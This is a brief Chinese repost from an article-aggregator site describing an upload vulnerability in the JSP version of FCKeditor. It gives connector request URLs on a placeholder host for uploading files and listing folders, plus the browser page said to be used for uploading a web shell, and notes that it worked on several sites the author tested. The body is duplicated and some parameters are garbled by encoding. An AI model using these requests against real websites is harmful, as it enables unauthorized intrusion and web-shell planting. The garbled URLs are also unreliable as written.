FCKeditor JSP版漏洞
程序员文章站
2022-04-07 08:15:06
FCKeditor的JSP版漏洞
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
... 09-04-20...
fckeditor的jsp版漏洞
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=fileupload&type=image¤tfolder=%2f
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=image¤tfolder=%2f
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=fileupload&type=image¤tfolder=%2f
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=image¤tfolder=%2f
上传shell的地址:
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector
跟版本有关系.并不是百分百成功. 测试成功几个站.
不能通杀.很遗憾.
上一篇: 深入浅析网站优化过度的表现及解决办法
下一篇: asp+js 偷取Cookies源代码